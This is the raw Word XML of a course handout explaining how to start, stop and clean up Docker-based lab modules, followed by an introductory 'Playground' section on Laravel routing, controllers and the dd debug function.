    <w:p w14:paraId="6D619043" w14:textId="4E1A8602" w:rsidR="00D33E1C" w:rsidRDefault="00D33E1C" w:rsidP="00D33E1C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D33E1C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use the same password </w:t>
      </w:r>
      <w:r w:rsidR="00093A6D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33E1C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D33E1C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C5FC44A" w14:textId="77777777" w:rsidR="00D33E1C" w:rsidRDefault="00D33E1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BCF3A1D" w14:textId="5B941E6B" w:rsidR="00D33E1C" w:rsidRDefault="00D33E1C" w:rsidP="00D33E1C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc183609079"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Starting a Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="0F11C3D7" w14:textId="1FB1ED4B" w:rsidR="00A50268" w:rsidRDefault="00A50268" w:rsidP="00174C2D">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A50268">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">All the modules for this class are located in </w:t>
      </w:r>
      <w:r w:rsidR="00174C2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>$HOME/classroom</w:t>
      </w:r>
      <w:r w:rsidR="00174C2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>`.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A50268">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Here's how to work with them:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247BF4F6" w14:textId="25685C3E" w:rsidR="00144801" w:rsidRDefault="00144801" w:rsidP="00E33E04">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc183609080"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Prepare the module:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="44E7F02E" w14:textId="131B468C" w:rsidR="00144801" w:rsidRPr="00144801" w:rsidRDefault="00144801" w:rsidP="00144801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00144801">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Navigate to the module folder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA18C2" w14:textId="77777777" w:rsidR="00144801" w:rsidRDefault="001448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9627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d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>modu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folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B47C04" w14:textId="00BAE0A5" w:rsidR="00144801" w:rsidRDefault="00144801" w:rsidP="00174C2D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n-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00144801">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Run the preparation script to set up the Docker image (not needed for participants using VM-Full)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF5571F" w14:textId="77777777" w:rsidR="00144801" w:rsidRDefault="001448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8566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/bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>prepa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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A18B8F" w14:textId="5557DF07" w:rsidR="00144801" w:rsidRDefault="00144801" w:rsidP="00E33E04">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc183609081"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Start the module:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="13CD5228" w14:textId="48FF57CE" w:rsidR="00144801" w:rsidRPr="00144801" w:rsidRDefault="00144801" w:rsidP="00144801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00144801">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Launch the module by running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDC857E" w14:textId="77777777" w:rsidR="008E00C4" w:rsidRDefault="008E00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40509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/bin/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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438553E9" w14:textId="0C0CEE1A" w:rsidR="00144801" w:rsidRPr="00144801" w:rsidRDefault="00144801" w:rsidP="00144801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00144801">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The web application will be accessible </w:t>
      </w:r>
      <w:r w:rsidRPr="008E00C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidR="008E00C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> `</w:t>
      </w:r>
      <w:r w:rsidR="008E00C4" w:rsidRPr="008E00C4">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>http://localhost:8888</w:t>
      </w:r>
      <w:r w:rsidR="008E00C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00144801">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403759EF" w14:textId="6ED7E157" w:rsidR="00144801" w:rsidRDefault="00144801" w:rsidP="00E33E04">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc183609082"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stop the module:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="2681EB49" w14:textId="5CA91E90" w:rsidR="00144801" w:rsidRPr="00144801" w:rsidRDefault="008F22AD" w:rsidP="00144801">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F22AD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After finishing, stop the module with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C797878" w14:textId="77777777" w:rsidR="008E00C4" w:rsidRDefault="008E00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14097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/bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>sto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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB36C3F" w14:textId="513ABCFC" w:rsidR="008F22AD" w:rsidRDefault="008F22AD" w:rsidP="00E33E04">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc183609083"/>
      <w:r w:rsidRPr="008F22AD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clean Up (Optional)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="604C7737" w14:textId="2AAD81AA" w:rsidR="008F22AD" w:rsidRPr="00144801" w:rsidRDefault="008F22AD" w:rsidP="008F22AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F22AD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To clean up Docker images, use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37584E5E" w14:textId="77777777" w:rsidR="008E00C4" w:rsidRDefault="008E00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2275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/bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>clea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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088A3143" w14:textId="40186182" w:rsidR="00E33E04" w:rsidRDefault="00E33E04">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0261803D" w14:textId="77777777" w:rsidR="00144801" w:rsidRDefault="00144801" w:rsidP="008F22AD">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F07BB29" w14:textId="4CF06DAC" w:rsidR="008F22AD" w:rsidRDefault="00E33E04" w:rsidP="00E33E04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc183609084"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Playground</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="72AF5956" w14:textId="0CAB7EB9" w:rsidR="00E33E04" w:rsidRPr="0007528F" w:rsidRDefault="0010106D" w:rsidP="0007528F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007528F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Key learning objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07766D2D" w14:textId="65CF3178" w:rsidR="0010106D" w:rsidRDefault="0010106D" w:rsidP="001010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aravel routing </w:t>
      </w:r>
      <w:r w:rsidR="00894837">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp; controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AA46E7" w14:textId="0642848A" w:rsidR="0010106D" w:rsidRPr="00D34726" w:rsidRDefault="0010106D" w:rsidP="00D347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aravel user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C91D18" w14:textId="7C456E1E" w:rsidR="00E33E04" w:rsidRDefault="0010106D" w:rsidP="0010106D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc183609085"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Getting Started</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1F652DE4" w14:textId="637427FE" w:rsidR="0010106D" w:rsidRDefault="0010106D" w:rsidP="0010106D">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Start the module with </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>./bin/start.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107E5534" w14:textId="51E15D6A" w:rsidR="0010106D" w:rsidRDefault="0010106D" w:rsidP="0010106D">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:rPr>
          <w:rStyle w:val="QuoteChar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DC98F9D" wp14:editId="22F0238A">
            <wp:extent cx="4820323" cy="857370"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="19050"/>
            <wp:docPr id="9488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702" name="Picture 948867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04AD9" w14:textId="52F427AC" w:rsidR="0010106D" w:rsidRDefault="0010106D" w:rsidP="0010106D">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0010106D">
        <w:t>By now, you should be able to access the web interface from the virtual machin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106D" w14:paraId="17D05426" w14:textId="77777777" w:rsidTr="0010106D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E50AB82" w14:textId="6FFCE5E0" w:rsidR="0010106D" w:rsidRPr="0010106D" w:rsidRDefault="0010106D" w:rsidP="0010106D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0010106D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0010106D" w14:paraId="6846EA13" w14:textId="77777777" w:rsidTr="0010106D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2364ACD3" w14:textId="568ABF5F" w:rsidR="0010106D" w:rsidRDefault="0010106D" w:rsidP="0010106D">
            <w:r>
              <w:t>http://localhost:8888</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05411D00" w14:textId="77777777" w:rsidR="00982EA4" w:rsidRDefault="00982EA4" w:rsidP="00982EA4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6D8BB0" w14:textId="64C218DF" w:rsidR="0010106D" w:rsidRDefault="00982EA4" w:rsidP="00982EA4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EEACABD" wp14:editId="0BACB874">
            <wp:extent cx="5731510" cy="2646045"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="20955"/>
            <wp:docPr id="17137983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98323" name="Picture 17137983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D7922" w14:textId="77777777" w:rsidR="00982EA4" w:rsidRDefault="00982EA4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B279883" w14:textId="2E023163" w:rsidR="0010106D" w:rsidRDefault="0010106D" w:rsidP="00174C2D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0010106D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To make it easier to navigate the codebase, open Sublime Text, go to </w:t>
      </w:r>
      <w:r w:rsidRPr="0010106D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File &gt; Open Folder</w:t>
      </w:r>
      <w:r w:rsidRPr="0010106D">
        <w:t>, and select the playground code folder located at `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>$HOME/classroom/playground/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0010106D">
        <w:t>`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02285127" w14:textId="175753D7" w:rsidR="0010106D" w:rsidRDefault="0010106D" w:rsidP="0010106D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C382518" wp14:editId="374F9955">
            <wp:extent cx="3105150" cy="3574054"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="26670"/>
            <wp:docPr id="253120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20155" name="Picture 2531201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57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10CFC" w14:textId="14CB81C5" w:rsidR="00D34726" w:rsidRDefault="00D34726" w:rsidP="00174C2D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Now you should be able to navigate the code much more freely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A082078" w14:textId="77777777" w:rsidR="00D34726" w:rsidRPr="00D34726" w:rsidRDefault="00D34726" w:rsidP="00D34726">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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  <w:bookmarkStart w:id="13" w:name="_Toc183084827"/>
      <w:bookmarkStart w:id="14" w:name="_Toc183088378"/>
      <w:bookmarkStart w:id="15" w:name="_Toc183104416"/>
      <w:bookmarkStart w:id="16" w:name="_Toc183104730"/>
      <w:bookmarkStart w:id="17" w:name="_Toc183609086"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="09183330" w14:textId="77777777" w:rsidR="00D34726" w:rsidRPr="00D34726" w:rsidRDefault="00D34726" w:rsidP="00D34726">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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  <w:bookmarkStart w:id="18" w:name="_Toc183084828"/>
      <w:bookmarkStart w:id="19" w:name="_Toc183088379"/>
      <w:bookmarkStart w:id="20" w:name="_Toc183104417"/>
      <w:bookmarkStart w:id="21" w:name="_Toc183104731"/>
      <w:bookmarkStart w:id="22" w:name="_Toc183609087"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="76B1A19B" w14:textId="77777777" w:rsidR="00D34726" w:rsidRPr="00D34726" w:rsidRDefault="00D34726" w:rsidP="00D34726">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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  <w:bookmarkStart w:id="23" w:name="_Toc183084829"/>
      <w:bookmarkStart w:id="24" w:name="_Toc183088380"/>
      <w:bookmarkStart w:id="25" w:name="_Toc183104418"/>
      <w:bookmarkStart w:id="26" w:name="_Toc183104732"/>
      <w:bookmarkStart w:id="27" w:name="_Toc183609088"/>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="142263C7" w14:textId="77777777" w:rsidR="00D34726" w:rsidRPr="00D34726" w:rsidRDefault="00D34726" w:rsidP="00D34726">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19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  <w:bookmarkStart w:id="28" w:name="_Toc183084830"/>
      <w:bookmarkStart w:id="29" w:name="_Toc183088381"/>
      <w:bookmarkStart w:id="30" w:name="_Toc183104419"/>
      <w:bookmarkStart w:id="31" w:name="_Toc183104733"/>
      <w:bookmarkStart w:id="32" w:name="_Toc183609089"/>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="111F5BCE" w14:textId="6C63AA2B" w:rsidR="00D34726" w:rsidRDefault="00D34726" w:rsidP="00D34726">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc183609090"/>
      <w:r>
        <w:t>Laravel Debug Function</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="76130D96" w14:textId="632D90ED" w:rsidR="004831D4" w:rsidRDefault="00A050A6" w:rsidP="00174C2D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A050A6">
        <w:t>For developers</w:t>
      </w:r>
      <w:r w:rsidRPr="00A050A6">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00A050A6">
        <w:t xml:space="preserve"> convenience, Laravel provides the `</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D95">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>dd</w:t>
      </w:r>
      <w:r w:rsidRPr="00A050A6">
        <w:t>` function. It makes it super easy to quickly display the contents of a variable in a clean, readable format. After printing the variable, it stops the script, so you can inspect the data without the rest of the code running. It's a great way to debug and check what's going on!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E75BFA" w14:textId="018FCF22" w:rsidR="00982EA4" w:rsidRDefault="00982EA4" w:rsidP="00982EA4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc183609091"/>
      <w:r>
        <w:t xml:space="preserve">Laravel </w:t>
      </w:r>
      <w:r w:rsidR="009D652E">
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>outing</w:t>
      </w:r>
      <w:r w:rsidR="009D652E">
        <w:t xml:space="preserve"> &amp; controller</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="0472F7C3" w14:textId="0F12F134" w:rsidR="00982EA4" w:rsidRDefault="00982EA4" w:rsidP="00982EA4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00982EA4">
        <w:t xml:space="preserve">The most basic Laravel routes accept a URI and a closure, providing a very simple and expressive method of defining routes and </w:t>
      </w:r>
      <w:r w:rsidR="000B7D95" w:rsidRPr="00982EA4">
        <w:t>behaviour</w:t>
      </w:r>
      <w:r w:rsidRPr="00982EA4">
        <w:t xml:space="preserve"> without complicated routing configuration files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D914FB0" w14:textId="77777777" w:rsidR="00982EA4" w:rsidRDefault="00982E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2521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u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lluminate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>\Support\Facades\Rou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AAF34D" w14:textId="58A9A7FA" w:rsidR="00982EA4" w:rsidRDefault="00982E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25216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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Rou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/greeting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4474B6" w14:textId="40DC0285" w:rsidR="00982EA4" w:rsidRDefault="008948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2521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 xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="00982EA4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidR="00982EA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82EA4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>'Hello World'</w:t>
      </w:r>
      <w:r w:rsidR="00982EA4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3E5C9B" w14:textId="77777777" w:rsidR="00982EA4" w:rsidRDefault="00982E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2521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7BD58AD8" w14:textId="6EC462BA" w:rsidR="008E54F3" w:rsidRDefault="008E54F3" w:rsidP="00DA7CD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008E54F3">
        <w:t>These routes can be accessed by typing the defined route's URL in your browser. For example, you can reach the following route by going to `</w:t>
      </w:r>
      <w:r w:rsidRPr="003C14C4">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>http://example.com/</w:t>
      </w:r>
      <w:r w:rsidR="00DA7CD6" w:rsidRPr="003C14C4">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>greeting</w:t>
      </w:r>
      <w:r w:rsidRPr="008E54F3">
        <w:t>` in your browser:</w:t>
      </w:r>
    </w:p>
